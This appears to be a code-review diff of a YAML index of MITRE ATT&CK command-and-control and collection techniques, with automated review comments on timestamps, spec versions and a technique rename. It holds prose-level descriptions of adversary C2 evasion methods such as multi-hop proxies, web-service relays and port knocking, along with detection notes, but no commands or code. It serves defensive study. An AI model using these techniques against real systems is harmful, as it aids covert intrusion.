Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37248,8 +37717,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37287,7 +37754,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37315,42 +37782,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -37359,17 +37806,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
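Review bot: `x_mitre_permissions_required: - User` is removed from T1102 here (and from T1568.002 above) while the same key is retained for T1574.012 and T1568 elsewhere in this diff, so any tooling that reads permissions from these entries has to tolerate both shapes; please confirm nothing in the index consumers depends on it. The rest of the hunk checks out: the new `Broadcom BirdyClient Microsoft Graph API 2024` reference resolves the citation added to the description in the previous hunk, `x_mitre_version` 1.1 to 1.2 and `x_mitre_attack_spec_version: 3.2.0` line up with an upstream update, and the `University of Birmingham C2` reference is only relocated, with its URL and description unchanged.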
@@ -37401,7 +37870,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
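Review bot: the `modified` timestamp for T1568.003 moves backwards, from 2021-04-29 to 2020-03-27, and the same regression recurs for several other objects in this patch (T1104, T1205.001, T1102.003, T1102.002, T1132.002, T1001.002, T1008, T1102.001, T1560.003). That is not a problem if the new value is the object's own `modified` from the upstream STIX export rather than a bundle-level date, but anything that uses `modified` as a "has this changed since I last synced" marker will miss these objects; worth a sentence in the commit message explaining where the new values come from.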
@@ -37418,8 +37887,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
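Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1568.003 without a replacement in the visible lines, whereas objects regenerated elsewhere in the patch carry 3.2.0 (or 3.1.0). Please confirm the key is still present on this object after regeneration (it may simply have moved outside the hunk's context), otherwise code that branches on the attack spec version will hit a missing key for this and the similarly edited objects (T1104, T1205.001, T1102.003, T1102.002, T1132.002, T1001.002, T1008, T1102.001, T1560.003).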
@@ -37439,7 +37906,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37462,8 +37929,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -37488,7 +37953,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37513,8 +37978,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -37579,7 +38042,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -37603,7 +38065,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37628,21 +38090,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
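Review bot: the T1090.003 description switches from the readable `|-` block scalar to a double-quoted scalar with `\n\n` escapes, which makes the text change (the new ORB sentence citing "ORB Mandiant") hard to review. The dumper is forced into quoted style by whitespace carried over from upstream: the escaped space `\ ` at the start of the "Protocols such as ICMP" line and the trailing spaces before each `\n\n` (after "(Citation: ORB Mandiant)" and after "transport."), neither of which a block scalar can represent. Stripping leading and trailing whitespace per paragraph in the generator would keep block style and keep future description diffs line-based; the escapes themselves are valid YAML, so this is a readability point, not a correctness one.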
@@ -37661,7 +38138,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37675,6 +38152,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37688,12 +38170,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37743,11 +38224,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37756,20 +38236,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -37794,17 +38274,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -37860,7 +38339,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -37885,7 +38363,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -37922,8 +38400,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -37977,7 +38453,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38049,33 +38524,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
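Review bot: renaming T1001.003 from "Protocol Impersonation" to "Protocol or Service Impersonation" (with the `x_mitre_version` bump 1.0 to 2.0 further down) changes the Technique Name value that the generated index CSV and Markdown files carry for this technique, so those indexes must be regenerated in the same change or the name will drift between the YAML and the per-platform indexes. The rest of this hunk is key reordering (platforms, domains, marking refs, id/type/created and external_references move to the end of the object) rather than content change.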
@@ -38083,23 +38537,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
@@ -38146,7 +38638,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38206,7 +38697,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38238,7 +38728,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38264,8 +38754,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38332,7 +38820,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38430,7 +38917,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -38523,7 +39009,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -38547,7 +39032,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -38570,8 +39055,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -38596,7 +39079,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -38616,8 +39099,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -38671,7 +39152,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -38696,7 +39176,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38722,8 +39202,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -38777,7 +39255,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -38853,7 +39330,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -38910,7 +39386,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39004,7 +39479,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39083,7 +39557,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
